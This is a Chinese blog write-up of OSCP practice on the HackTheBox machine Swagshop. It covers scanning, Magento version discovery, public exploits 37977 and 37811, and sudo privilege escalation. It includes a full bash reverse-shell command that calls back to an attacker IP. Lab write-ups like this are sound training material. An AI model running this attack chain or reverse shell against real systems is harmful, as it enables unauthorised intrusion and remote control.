EthanDoctor

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

Ethan医生7个月前靶场233

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)

image.png




nmap -sU --top-ports 100 10.129.180.205 (扫描UDP)

image.png



访问80端口直接跳转swagshop.htb 绑定HOST


image.png

https://github.com/steverobbins/magescan/releases 查看版本

php magescan.phar scan:all http://swagshop.htb

image.png

然后查看有没有漏洞

image.png

使用37977.py,需要加index.php

image.png

image.png

有了账号密码可以执行另外一个RCE 37811

image.png

直接反弹SHELL,

python2 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"

image.png

image.png

sudo -l

image.png

image.png

写入

!/bin/bash

直接跳转root权限

image.png

5c0dddff61853908d0441b804ec0a383

标签: OSCP
返回列表

上一篇:OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

下一篇: OSCP备考_0x15_HackThBox靶机_Linux_networked

相关文章

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

OSCP备考_0x07_Vulnhub靶机_Tr0ll: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-2,107/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号